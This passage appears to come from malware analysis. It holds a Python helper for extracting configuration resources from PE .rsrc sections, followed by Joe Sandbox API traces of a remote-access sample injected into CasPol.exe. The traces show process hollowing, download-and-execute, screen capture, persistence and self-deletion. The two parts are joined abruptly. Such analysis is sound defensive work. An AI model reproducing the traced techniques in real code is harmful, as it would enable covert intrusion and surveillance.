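                start = data_rva - rsrc_rva                             # RVA -> offset inside .rsrc
                if start < 0 or start + size > len(rsrc):
                    raise ValueError("resource data lies outside the .rsrc section")
                return bytes(rsrc[start:start + size])
    return None


def build_rsrc(rsrc_rva, entries):
    """Test fixture only: build a minimal .rsrc section holding one RCDATA type directory
    with the given (name_or_id, data) pairs, each under language 0x0409."""
    n = len(entries)
    type_off = 24                                  # root header (16) + one type entry (8)
    name_dirs_off = type_off + 16 + 8 * n          # one 24-byte name directory per resource
    str_off = name_dirs_off + 24 * n
    strings, str_offsets = b"", []
    for name, _ in entries:
        str_offsets.append(str_off + len(strings) if isinstance(name, str) else None)
        if isinstance(name, str):
            strings += struct.pack("<H", len(name)) + name.encode("utf-16-le")
    de_off = str_off + len(strings)
    de_off += (-de_off) % 4                        # align the data entries
    blob_off = de_off + 16 * n
    out = bytearray(blob_off)
    struct.pack_into("<IIHHHH", out, 0, 0, 0, 0, 0, 0, 1)
    struct.pack_into("<II", out, 16, RT_RCDATA, HIGH_BIT | type_off)
    named = [(i, e) for i, e in enumerate(entries) if isinstance(e[0], str)]
    ids = [(i, e) for i, e in enumerate(entries) if not isinstance(e[0], str)]
    struct.pack_into("<IIHHHH", out, type_off, 0, 0, 0, 0, len(named), len(ids))
    pos = type_off + 16
    for i, (name, _) in named + ids:              # named entries first, as the format requires
        nd = name_dirs_off + 24 * i
        name_field = (HIGH_BIT | str_offsets[i]) if isinstance(name, str) else name
        struct.pack_into("<II", out, pos, name_field, HIGH_BIT | nd)
        pos += 8
        struct.pack_into("<IIHHHH", out, nd, 0, 0, 0, 0, 0, 1)
        struct.pack_into("<II", out, nd + 16, 0x0409, de_off + 16 * i)
    out[str_off:str_off + len(strings)] = strings
    blobs = b""
    for i, (_, data) in enumerate(entries):
        struct.pack_into("<IIII", out, de_off + 16 * i, rsrc_rva + blob_off + len(blobs), len(data), 0, 0)
        blobs += data
    return bytes(out) + blobs


SAMPLE_RVA = 0x3000                                # assumed .rsrc RVA for the fixture
SAMPLE_RESOURCES = [("SETTINGS", b"cfg-bytes"), (100, b"other")]


def sample_rsrc():
    return build_rsrc(SAMPLE_RVA, SAMPLE_RESOURCES)


if __name__ == "__main__":
    print(find_resource(sample_rsrc(), SAMPLE_RVA, RT_RCDATA, "SETTINGS"))
```

On a real dump, feed find_resource() the bytes of the .rsrc section and its VirtualAddress from the section table; the same walk works for any type/name pair, so it doubles as a general resource extractor for other families that hide configuration in RCDATA.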
                                                                              APIs
                                                                                • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,0043E260,0043931C,0043E260,?,?,0043B955,FF8BC35D), ref: 00446EC3
                                                                                • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F37
                                                                                • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446F1E
                                                                                • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F2B
                                                                              • GetUserDefaultLCID.KERNEL32 ref: 004514C3
                                                                              • IsValidCodePage.KERNEL32(00000000), ref: 0045151E
                                                                              • IsValidLocale.KERNEL32(?,00000001), ref: 0045152D
                                                                              • GetLocaleInfoW.KERNEL32(?,00001001,?,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 00451575
                                                                              • GetLocaleInfoW.KERNEL32(?,00001002,?,00000040), ref: 00451594
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                                                              • String ID:
                                                                              • API String ID: 745075371-0
                                                                              • Opcode ID: 5c8e94395c66df2641350def7a129c2a5847567c9c00908226c609ff7e549d11
                                                                              • Instruction ID: fdda48fcf8ef828b158f806230e01f9d82b9b72a6df542884d0e4dc3e0683d2c
                                                                              • Opcode Fuzzy Hash: 5c8e94395c66df2641350def7a129c2a5847567c9c00908226c609ff7e549d11
                                                                              • Instruction Fuzzy Hash: 5A51D571900205ABEF10EFA5CC40BBF73B8AF05702F14056BFD11EB262E7789A488769
                                                                              APIs
                                                                              • __EH_prolog.LIBCMT ref: 00407A91
                                                                              • FindFirstFileW.KERNEL32(00000000,?,00465AA0,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B4A
                                                                              • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B6E
                                                                              • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407C76
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Find$File$CloseFirstH_prologNext
                                                                              • String ID:
                                                                              • API String ID: 1157919129-0
                                                                              • Opcode ID: ad182ef0116283bf3863836c6a83626c4c767cd38c875da217e7cde8bb8463e0
                                                                              • Instruction ID: c296e4c637b16ec180f1d25cf2666c4e6f2336455dd814d501b84ef2841b6e91
                                                                              • Opcode Fuzzy Hash: ad182ef0116283bf3863836c6a83626c4c767cd38c875da217e7cde8bb8463e0
                                                                              • Instruction Fuzzy Hash: 485173329041085ACB14FB65DD969DD7778AF50318F50417EB806B31E2EF38AB498B99
                                                                              APIs
                                                                              • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406234
                                                                              • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 00406318
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: DownloadExecuteFileShell
                                                                              • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe$open
                                                                              • API String ID: 2825088817-4197237851
                                                                              • Opcode ID: 7e776ba55a5363882e5e0fdd32d5076bdbc944cfa7fb92e574dd5d07027ce71d
                                                                              • Instruction ID: f68f5450864a8ef507c8d3860f756bd811b48be2db930e76b40a644c5c1bb7bc
                                                                              • Opcode Fuzzy Hash: 7e776ba55a5363882e5e0fdd32d5076bdbc944cfa7fb92e574dd5d07027ce71d
                                                                              • Instruction Fuzzy Hash: 0761A33160434067CA14FA76C8569BE77A69F81718F00493FBC46772D6EF3C9A05C69B
                                                                              APIs
                                                                              • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00406ADD
                                                                              • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00406BA5
                                                                                • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: FileFind$FirstNextsend
                                                                              • String ID: x@G$x@G
                                                                              • API String ID: 4113138495-3390264752
                                                                              • Opcode ID: ab297d9523434e33b62ec7d17f5bfb0d18f84337fe1b3eac542df82c58dbccc1
                                                                              • Instruction ID: 9df0c8526107c53e8273efc1e688d8f669138e67c86485f4ac558c26d22f9560
                                                                              • Opcode Fuzzy Hash: ab297d9523434e33b62ec7d17f5bfb0d18f84337fe1b3eac542df82c58dbccc1
                                                                              • Instruction Fuzzy Hash: B42147725043015BC714FB61D8959AF77A8AFD1358F40093EF996A31D1EF38AA088A9B
APIs
• SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041BC6C
  • Part of subcall function 004126D2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004126E1
  • Part of subcall function 004126D2: RegSetValueExA.KERNELBASE(?,HgF,00000000,?,00000000,00000000,004742F8,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412709
  • Part of subcall function 004126D2: RegCloseKey.KERNELBASE(?,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412714
Memory Dump Source
• Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
Similarity
• API ID: CloseCreateInfoParametersSystemValue
• String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
• API String ID: 4127273184-3576401099
APIs
• SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041BC6C
  • Part of subcall function 004126D2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004126E1
  • Part of subcall function 004126D2: RegSetValueExA.KERNELBASE(?,HgF,00000000,?,00000000,00000000,004742F8,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412709
  • Part of subcall function 004126D2: RegCloseKey.KERNELBASE(?,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412714
Memory Dump Source
• Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
Similarity
• API ID: CloseCreateInfoParametersSystemValue
• String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
• API String ID: 4127273184-3576401099
APIs
  • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,0043E260,0043931C,0043E260,?,?,0043B955,FF8BC35D), ref: 00446EC3
  • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
  • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F37
  • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
• IsValidCodePage.KERNEL32(00000000), ref: 00450B61
• _wcschr.LIBVCRUNTIME ref: 00450BF1
• _wcschr.LIBVCRUNTIME ref: 00450BFF
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,?,00000000,?), ref: 00450CA2
Memory Dump Source
• Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
Similarity
• API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
• String ID:
• API String ID: 4212172061-0
APIs
• __EH_prolog.LIBCMT ref: 00408DAC
• FindFirstFileW.KERNEL32(00000000,?), ref: 00408E24
• FindNextFileW.KERNEL32(00000000,?), ref: 00408E4D
Memory Dump Source
• Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
Similarity
• API ID: FileFind$FirstH_prologNext
• String ID:
• API String ID: 301083792-0
APIs
• _free.LIBCMT ref: 00448067
  • Part of subcall function 00446AC5: HeapFree.KERNEL32(00000000,00000000,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?), ref: 00446ADB
  • Part of subcall function 00446AC5: GetLastError.KERNEL32(?,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?,?), ref: 00446AED
• GetTimeZoneInformation.KERNEL32 ref: 00448079
• WideCharToMultiByte.KERNEL32(00000000,?,0047179C,000000FF,?,0000003F,?,?), ref: 004480F1
• WideCharToMultiByte.KERNEL32(00000000,?,004717F0,000000FF,?,0000003F,?,?,?,0047179C,000000FF,?,0000003F,?,?), ref: 0044811E
Memory Dump Source
• Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
Similarity
• API ID: ByteCharMultiWide$ErrorFreeHeapInformationLastTimeZone_free
• String ID:
• API String ID: 806657224-0
APIs
  • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,0043E260,0043931C,0043E260,?,?,0043B955,FF8BC35D), ref: 00446EC3
  • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
  • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F37
  • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
  • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446F1E
  • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F2B
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450EBE
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450F0F
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450FCF
Memory Dump Source
• Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
Similarity
• API ID: ErrorInfoLastLocale$_free$_abort
• String ID:
• API String ID: 2829624132-0
APIs
• IsDebuggerPresent.KERNEL32(?,?,?,?,?,00434403), ref: 0043A755
• SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00434403), ref: 0043A75F
• UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00434403), ref: 0043A76C
Memory Dump Source
• Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
Similarity
• API ID: ExceptionFilterUnhandled$DebuggerPresent
• String ID:
• API String ID: 3906539128-0
APIs
• GetCurrentProcess.KERNEL32(004453F8,?,0044252A,004453F8,0046DAE0,0000000C,00442681,004453F8,00000002,00000000,?,004453F8), ref: 00442575
• TerminateProcess.KERNEL32(00000000,?,0044252A,004453F8,0046DAE0,0000000C,00442681,004453F8,00000002,00000000,?,004453F8), ref: 0044257C
• ExitProcess.KERNEL32 ref: 0044258E
Memory Dump Source
• Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
Similarity
• API ID: Process$CurrentExitTerminate
• String ID:
• API String ID: 1703294689-0
APIs
• GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,?,?,00000004), ref: 004475EA
Memory Dump Source
• Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
Similarity
• API ID: InfoLocale
• String ID: GetLocaleInfoEx
• API String ID: 2299586839-2904428671
APIs
  • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,0043E260,0043931C,0043E260,?,?,0043B955,FF8BC35D), ref: 00446EC3
  • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
  • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F37
  • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
  • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446F1E
  • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F2B
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0045110E
Memory Dump Source
• Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
Similarity
• API ID: ErrorLast$_free$InfoLocale_abort
• String ID:
• API String ID: 1663032902-0
APIs
  • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,0043E260,0043931C,0043E260,?,?,0043B955,FF8BC35D), ref: 00446EC3
  • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
  • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F37
  • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
• EnumSystemLocalesW.KERNEL32(00450E6A,00000001), ref: 00450DB4
Memory Dump Source
• Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
Similarity
• API ID: ErrorLast$EnumLocalesSystem_abort_free
• String ID:
• API String ID: 1084509184-0
APIs
  • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,0043E260,0043931C,0043E260,?,?,0043B955,FF8BC35D), ref: 00446EC3
  • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
  • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F37
  • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
• GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00451088,00000000,00000000,?), ref: 00451316
Memory Dump Source
• Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
Similarity
• API ID: ErrorLast$InfoLocale_abort_free
• String ID:
• API String ID: 2692324296-0
APIs
  • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,0043E260,0043931C,0043E260,?,?,0043B955,FF8BC35D), ref: 00446EC3
  • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
  • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F37
  • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
• EnumSystemLocalesW.KERNEL32(004510BA,00000001), ref: 00450E29
Memory Dump Source
• Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
Similarity
• API ID: ErrorLast$EnumLocalesSystem_abort_free
• String ID:
• API String ID: 1084509184-0
APIs
  • Part of subcall function 00444ACC: EnterCriticalSection.KERNEL32(-0003D155,?,0044225B,00000000,0046DAC0,0000000C,00442216,?,?,?,00448739,?,?,00446F74,00000001,00000364), ref: 00444ADB
• EnumSystemLocalesW.KERNEL32(Function_00047068,00000001,0046DC48,0000000C), ref: 004470E6
Similarity
• API ID: CriticalEnterEnumLocalesSectionSystem
• String ID:
• API String ID: 1272433827-0
• Opcode ID: 294c88a1965c44704c377604ff0a5917817e93c6b6b84f866ad5a3c5a2dedf6a
• Instruction ID: 877f7ae5c491a2fbf36f534f7b8138893028b6a81f24f5c3744eb9f6a7677366
• Instruction Fuzzy Hash: F6F04932A10200EFEB04EF68E806B4D77B0EB44725F10816AF414DB2E2DB7889818B49
APIs
  • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,0043E260,0043931C,0043E260,?,?,0043B955,FF8BC35D), ref: 00446EC3
  • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
  • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F37
  • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
• EnumSystemLocalesW.KERNEL32(00450C4E,00000001), ref: 00450D2E
Similarity
• API ID: ErrorLast$EnumLocalesSystem_abort_free
• String ID:
• API String ID: 1084509184-0
• Opcode ID: 8c2bccbfd0fc102635c006ca31f830fd57f68f19690e6c985b1f52cdbb333b18
• Instruction ID: ec648f77c102ae861fabd43d141f98194b25f4d0b1f390d0839222eb7000fb0b
• Instruction Fuzzy Hash: CBF05C3D30020557CB159F35D81576B7F94EFC2711B07405AFE098B381C239D846C754
APIs
• GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,004145AD,00473EE8,00474A10,00473EE8,00000000,00473EE8,?,00473EE8,5.3.0 Pro), ref: 0040E68D
Similarity
• API ID: InfoLocale
• String ID:
• API String ID: 2299586839-0
• Opcode ID: ca1801b0e7e1465037cdf6632266da67ea6c9527f0861a44216c95eff7fcfe3c
• Instruction ID: fdf89a5244b67fc368892e36cd71d3b7bc7b33248e42f87f25a9228cb5794c84
• Instruction Fuzzy Hash: E6D05E607002197BEA109291DC0AE9B7A9CE700B66F000165BA01E72C0E9A0AF008AE1
APIs
• SetUnhandledExceptionFilter.KERNEL32(Function_00033CE3,004339B1), ref: 00433CDC
Similarity
• API ID: ExceptionFilterUnhandled
• String ID:
• API String ID: 3192549508-0
• Opcode ID: 3670727f3e8651977646328ecd403d2a1b3c6ba49dd5bfb528ab2007e995f695
• Instruction ID: 83953e3dca8a62111c248ad4478ddd9c1373f985a30770e5fc8846644fe13ce9
• Instruction Fuzzy Hash:
APIs
Similarity
• API ID: HeapProcess
• String ID:
• API String ID: 54951025-0
• Opcode ID: c4eeb5daf7d20212f04cf1a35fe49476965deb7007d4ee0647dc212291e34da0
• Instruction ID: 9504a653bcf427532d5064532c05f1d04939bb5561e35e6535c2a7eba45b7a60
• Instruction Fuzzy Hash: 84A00270506201CB57404F756F0525937D9654559170580755409C5571D62585905615
APIs
• CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00417FB9
• CreateCompatibleDC.GDI32(00000000), ref: 00417FC4
  • Part of subcall function 00418452: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00418482
• CreateCompatibleBitmap.GDI32(?,00000000), ref: 00418045
• DeleteDC.GDI32(?), ref: 0041805D
• DeleteDC.GDI32(00000000), ref: 00418060
• SelectObject.GDI32(00000000,00000000), ref: 0041806B
• StretchBlt.GDI32(00000000,00000000,00000000,00000000,?,?,?,?,00000000,?,00CC0020), ref: 00418093
• GetIconInfo.USER32(?,?), ref: 004180CB
• DeleteObject.GDI32(?), ref: 004180FA
• DeleteObject.GDI32(?), ref: 00418107
• DrawIcon.USER32(00000000,?,?,?), ref: 00418114
• BitBlt.GDI32(00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00660046), ref: 00418144
• GetObjectA.GDI32(?,00000018,?), ref: 00418173
• LocalAlloc.KERNEL32(00000040,00000028), ref: 004181BC
• LocalAlloc.KERNEL32(00000040,00000001), ref: 004181DF
• GlobalAlloc.KERNEL32(00000000,?), ref: 00418248
• GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0041826B
• DeleteDC.GDI32(?), ref: 0041827F
• DeleteDC.GDI32(00000000), ref: 00418282
• DeleteObject.GDI32(00000000), ref: 00418285
• GlobalFree.KERNEL32(00CC0020), ref: 00418290
• DeleteObject.GDI32(00000000), ref: 00418344
• GlobalFree.KERNEL32(?), ref: 0041834B
• DeleteDC.GDI32(?), ref: 0041835B
• DeleteDC.GDI32(00000000), ref: 00418366
• DeleteDC.GDI32(?), ref: 00418398
• DeleteDC.GDI32(00000000), ref: 0041839B
• DeleteObject.GDI32(?), ref: 004183A1
Similarity
• API ID: Delete$Object$AllocCreateGlobal$CompatibleFreeIconLocal$BitmapBitsDisplayDrawEnumInfoSelectSettingsStretch
• String ID: DISPLAY
• API String ID: 1765752176-865373369
• Opcode ID: a503a9b89ef94286f2bd859c106661c8df3b5c206ce18e082a0ee4f25f069b57
• Instruction ID: f05cd178694609e891ba83f5bdf02bb76ea447df34f4969275af8919d08089d1
• Instruction Fuzzy Hash: 12C17C31508345AFD3209F25DC44BABBBE9FF88751F04082EF989932A1DB34E945CB5A
APIs
• GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 0041728C
• GetProcAddress.KERNEL32(00000000), ref: 0041728F
• GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 004172A0
• GetProcAddress.KERNEL32(00000000), ref: 004172A3
• GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 004172B4
• GetProcAddress.KERNEL32(00000000), ref: 004172B7
• GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 004172C8
• GetProcAddress.KERNEL32(00000000), ref: 004172CB
• CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 0041736C
• VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 00417384
• GetThreadContext.KERNEL32(?,00000000), ref: 0041739A
• ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 004173C0
• VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00417440
• TerminateProcess.KERNEL32(?,00000000), ref: 00417454
• GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 0041748B
• WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00417558
• SetThreadContext.KERNEL32(?,00000000), ref: 00417575
• ResumeThread.KERNEL32(?), ref: 00417582
• VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0041759A
• GetCurrentProcess.KERNEL32(?), ref: 004175A5
• TerminateProcess.KERNEL32(?,00000000), ref: 004175BF
• GetLastError.KERNEL32 ref: 004175C7
Similarity
• API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
• String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
• API String ID: 4188446516-3035715614
• Opcode ID: 54fdfb5aabe8aa90e4b9fd0d09de0377c5cbab22ce463c390d1f780909c70293
• Instruction ID: f03761d26bac9a2bfb1ad98f85ac7da09ef0bd98ba300517d6d91d37beebd467
• Instruction Fuzzy Hash: EEA17C71508304AFD7209F65DC45B6B7BF9FF48345F00082AF689C2661E775E984CB6A
APIs
• CreateMutexA.KERNEL32(00000000,00000001,00000000,004742F8,?,00000000), ref: 004112D4
• ExitProcess.KERNEL32 ref: 0041151D
  • Part of subcall function 0041265D: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,004742F8), ref: 00412679
  • Part of subcall function 0041265D: RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,00000208,?), ref: 00412692
  • Part of subcall function 0041265D: RegCloseKey.ADVAPI32(00000000), ref: 0041269D
  • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B633
• CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,?,?,?,00000000), ref: 0041135B
• OpenProcess.KERNEL32(00100000,00000000,T@,?,?,?,?,00000000), ref: 0041136A
• WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,00000000), ref: 00411375
• CloseHandle.KERNEL32(00000000,?,?,?,?,00000000), ref: 0041137C
• GetCurrentProcessId.KERNEL32(?,?,?,?,00000000), ref: 00411382
  • Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
  • Part of subcall function 004127D5: RegSetValueExA.KERNELBASE(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
  • Part of subcall function 004127D5: RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
• PathFileExistsW.SHLWAPI(?,?,?,?,?,00000000), ref: 004113B3
• GetTempPathW.KERNEL32(00000104,?,?,?,?,?,?,?,?,00000000), ref: 0041140F
• GetTempFileNameW.KERNEL32(?,temp_,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00411429
• lstrcatW.KERNEL32(?,.exe,?,?,?,?,?,?,?,00000000), ref: 0041143B
  • Part of subcall function 0041B58F: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0041B5EB
  • Part of subcall function 0041B58F: WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041B5FF
  • Part of subcall function 0041B58F: CloseHandle.KERNEL32(00000000), ref: 0041B60C
• ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 00411483
• Sleep.KERNEL32(000001F4,?,?,?,?,00000000), ref: 004114C4
• OpenProcess.KERNEL32(00100000,00000000,?,?,?,?,?,00000000), ref: 004114D9
• WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,00000000), ref: 004114E4
• CloseHandle.KERNEL32(00000000,?,?,?,?,00000000), ref: 004114EB
• GetCurrentProcessId.KERNEL32(?,?,?,?,00000000), ref: 004114F1
  • Part of subcall function 0041B58F: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00465900,00000000,00000000,0040C267,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041B5CE
Similarity
